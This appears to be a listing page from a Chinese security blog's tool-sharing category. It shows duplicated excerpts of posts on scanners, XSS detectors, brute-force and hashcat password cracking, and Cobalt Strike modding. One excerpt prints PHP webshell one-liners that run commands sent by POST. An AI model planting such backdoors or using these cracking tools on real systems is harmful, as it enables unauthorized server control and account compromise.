SRCHunter一款基于python的开源扫描器 NNN4cy 工具分享 2018-05-28 2119 0 0 目前支持的功能 1 2 3 4 5 6 7 8 9 10 11 全自动扫描: python webmain.py -a target.com --> baidu_site && port/di…
SRCHunter一款基于python的开源扫描器 NNN4cy 工具分享 2018-05-28 2119 0 0 目前支持的功能 1 2 3 4 5 6 7 8 9 10 11 全自动扫描: python webmain.py -a target.com --> baidu_site && port/di…
端口扫描器的几种代码实现方案 NNN4cy 工具分享 2018-05-23 2347 0 1 搞安全的应该都知道端口扫描在渗透测试、漏洞扫描过程中的重要性,其与URL爬虫等技术构成了漏洞扫描的第一阶段,即目标信息收集。因此能否开发出一款高效稳定的端口扫描器,往往决定了漏洞扫描器的好坏。那么说到端口扫描器,我们往往会先想到nm…
端口扫描器的几种代码实现方案 NNN4cy 工具分享 2018-05-23 2347 0 1 搞安全的应该都知道端口扫描在渗透测试、漏洞扫描过程中的重要性,其与URL爬虫等技术构成了漏洞扫描的第一阶段,即目标信息收集。因此能否开发出一款高效稳定的端口扫描器,往往决定了漏洞扫描器的好坏。那么说到端口扫描器,我们往往会先想到nm…
php一句话木马集合 NNN4cy WEB安全, 工具分享 2018-05-22 5638 0 0 eval.php 1 <?php @eval($_POST['cmd'])?> assert.php 1 <?php assert($_POST[cmd]);?> min_lenth.php 1 2 <…
php一句话木马集合 NNN4cy WEB安全, 工具分享 2018-05-22 5638 0 0 eval.php 1 <?php @eval($_POST['cmd'])?> assert.php 1 <?php assert($_POST[cmd]);?> min_lenth.php 1 2 <…
使用hashcat破解加密office文件 NNN4cy 工具分享 2018-05-14 2598 0 1 首先要下载 office2john.py,支持破解的加密为office自带的加密功能,即: 使用office2john将office转换为hash: 1 python office2john.py 123.docx > has…
使用hashcat破解加密office文件 NNN4cy 工具分享 2018-05-14 2598 0 1 首先要下载 office2john.py,支持破解的加密为office自带的加密功能,即: 使用office2john将office转换为hash: 1 python office2john.py 123.docx > has…
brut3k1t – 一款模块化的服务端暴力破解工具 SecJack 工具分享 2018-05-11 2106 0 1 项目地址:https://github.com/ex0dus-0x/brut3k1t 1. Introduction brut3k1t是一款服务端的暴力破解模块,支持多种协议的字典攻击。目前完整支持的协议有: [crayon-63d…
brut3k1t – 一款模块化的服务端暴力破解工具 SecJack 工具分享 2018-05-11 2106 0 1 项目地址:https://github.com/ex0dus-0x/brut3k1t 1. Introduction brut3k1t是一款服务端的暴力破解模块,支持多种协议的字典攻击。目前完整支持的协议有: [crayon-63d…
xss漏洞探测工具-xssfork SecJack 工具分享 2018-05-11 2486 0 1 xssfork简介 xssfork作为sicklescan的一个功能模块,其开发主要目的是用于检测xss漏洞。 传统的xss探测工具,一般都是采用 payload in response的方式,即在发送一次带有payload的htt…
xss漏洞探测工具-xssfork SecJack 工具分享 2018-05-11 2486 0 1 xssfork简介 xssfork作为sicklescan的一个功能模块,其开发主要目的是用于检测xss漏洞。 传统的xss探测工具,一般都是采用 payload in response的方式,即在发送一次带有payload的htt…
Kali Linux信息收集之nbtscan-unixwiz NNN4cy 工具分享 2018-05-08 1244 0 0 0x00 介绍 一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具。它基于Windows系统的nbtstat工具的功能实现,但它可在许多地址上运行,而不是仅一个地址。 主页 | 仓库 作者:Steve …
Kali Linux信息收集之nbtscan-unixwiz NNN4cy 工具分享 2018-05-08 1244 0 0 0x00 介绍 一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具。它基于Windows系统的nbtstat工具的功能实现,但它可在许多地址上运行,而不是仅一个地址。 主页 | 仓库 作者:Steve …
Cobalt strike3.8 中文支持(Update) NNN4cy 工具分享 2018-04-24 1464 0 0 0x00 简介 cobaltstrike3.10 已经出来很久了,其中最吸引人的可能就是他已经支持中文了,但是貌似很久以来都没在网上看到3.10的资源,所以就没办法,拿手上的3.8 改改将就用。 0x01 反编译 首先我们要对cob…
Cobalt strike3.8 中文支持(Update) NNN4cy 工具分享 2018-04-24 1464 0 0 0x00 简介 cobaltstrike3.10 已经出来很久了,其中最吸引人的可能就是他已经支持中文了,但是貌似很久以来都没在网上看到3.10的资源,所以就没办法,拿手上的3.8 改改将就用。 0x01 反编译 首先我们要对cob…
全自动检测xss以及批量化全网扫描工具 SecJack 工具分享 2018-04-24 4174 0 0 “Scripter”(又名XSSer)是一个自动框架,用于在基于Web的应用程序中检测,利用和报告XSS漏洞。 下载地址: git clone https://github.com/epsylon/xsser 安装: XSSer在许…
全自动检测xss以及批量化全网扫描工具 SecJack 工具分享 2018-04-24 4174 0 0 “Scripter”(又名XSSer)是一个自动框架,用于在基于Web的应用程序中检测,利用和报告XSS漏洞。 下载地址: git clone https://github.com/epsylon/xsser 安装: XSSer在许…
借鉴开源框架自研日志收集系统 NNN4cy 工具分享 2018-04-24 785 0 0 项目背景 公司项目需要将分布在多台机器中的日志统一收集管理。笔者先后使用logstash,flume等开源项目。并最终自研一套基于Java语言的日志收集系统 Bloodhound。以下从项目关注的角度对开源系统与自研进行分析。 1 …
借鉴开源框架自研日志收集系统 NNN4cy 工具分享 2018-04-24 785 0 0 项目背景 公司项目需要将分布在多台机器中的日志统一收集管理。笔者先后使用logstash,flume等开源项目。并最终自研一套基于Java语言的日志收集系统 Bloodhound。以下从项目关注的角度对开源系统与自研进行分析。 1 …